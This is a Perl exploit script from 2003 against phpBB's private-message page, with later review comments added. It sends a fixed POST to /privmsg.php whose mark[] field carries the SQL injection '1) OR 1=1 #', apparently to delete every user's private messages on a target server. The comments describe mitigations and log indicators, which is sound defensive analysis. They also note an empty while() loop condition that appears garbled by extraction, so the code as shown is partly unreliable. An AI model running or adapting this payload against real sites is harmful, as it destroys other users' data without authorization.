#!/usr/bin/perl --

# phpBB delete the text of all users' private messages exploit
# Ulf Harnhammar
# January 2003
#
# Summary: sends one fixed HTTP/1.0 POST to /privmsg.php on port 80 of the
# given host, carrying the session id from the command line. The form body
# is constant; its mark[] field URL-decodes to "1) OR 1=1 #", i.e. an SQL
# fragment instead of a numeric message id.
#
# NOTE(review): the server-side query is not shown on this page. The closing
# parenthesis and trailing "#" comment marker suggest the value is
# interpolated unquoted into a parenthesised id list of a delete statement;
# confirm against the phpBB source before relying on that.
#
# Mitigation (server side): force every mark[] element to an integer before
# it reaches the query, or bind the ids as parameters, and apply the vendor
# fix (fixed version not stated on this page).
#
# Detection: the request line, User-Agent and Referer below are static
# strings in this script and can serve as low-fidelity log indicators. The
# POST body is usually not in access logs, so a request filter that rejects
# non-digit mark[] values is the more reliable control.

use Socket;

# Exactly two arguments are required: target host and a session id.
if (@ARGV != 2)
{
  die "usage: $0 host sid\n";
}

($host, $sid) = @ARGV;
# Remove all whitespace from both arguments; no other validation is done, so
# the sid is placed into the request line as given.
$host =~ s|\s+||g;
$sid =~ s|\s+||g;

# CR LF line terminator for the HTTP header lines.
$crlf = "\015\012";

# The complete request. Content-Length is hard-coded to 58, which matches the
# length of the fixed body on the last line. The body URL-decodes to:
#   mode=&delete=true&mark[]=1) OR 1=1 #&confirm=Yes
$http = "POST /privmsg.php?folder=inbox&sid=$sid HTTP/1.0$crlf".
        "Host: $host$crlf".
        "User-Agent: Mozzarella/1.37++$crlf".
        "Referer: http://www.phpbb.com/$crlf".
        "Connection: close$crlf".
        "Content-Type: application/x-www-form-urlencoded$crlf".
        "Content-Length: 58$crlf$crlf".
        "mode=&delete=true&mark%5B%5D=1%29+OR+1%3D1+%23&confirm=Yes";

# Resolve the protocol number and host address, then build the port-80
# socket address. Plain HTTP only; there is no TLS handling in this script.
$tcp = getprotobyname('tcp') or die "Couldn't getprotobyname!\n";
$hosti = inet_aton($host) or die "Couldn't look up host!\n";
$hosts = sockaddr_in(80, $hosti);

socket(SOK, PF_INET, SOCK_STREAM, $tcp) or die "Couldn't socket!\n";
connect(SOK, $hosts) or die "Couldn't connect to port!\n";

# Turn on autoflush for SOK ($| applies to the currently selected handle),
# then restore STDOUT as the default output handle.
select SOK; $| = 1; select STDOUT;

print SOK $http;

# The response is accumulated into $junk and never printed or inspected, so
# the script gives no indication of whether the request had any effect.
# NOTE(review): the loop condition is empty as it appears on this page; a
# read from SOK was presumably lost when the page was extracted (angle
# brackets stripped as markup). As written, the condition never becomes
# false. Confirm against the original posting.
$junk = '';
while ()
{
  $junk .= $_;
}

close SOK or die "Couldn't close!\n";